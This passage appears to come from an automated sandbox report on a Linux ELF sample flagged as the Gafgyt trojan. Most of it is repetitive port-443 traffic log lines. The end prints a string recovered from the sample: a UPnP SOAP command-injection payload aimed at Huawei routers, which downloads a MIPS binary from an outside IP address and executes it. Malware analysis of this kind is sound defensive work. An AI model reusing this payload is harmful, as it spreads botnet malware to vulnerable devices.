            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932

            System Summary

            barindex
            Source: pBVFNv9jh6.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: pBVFNv9jh6.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
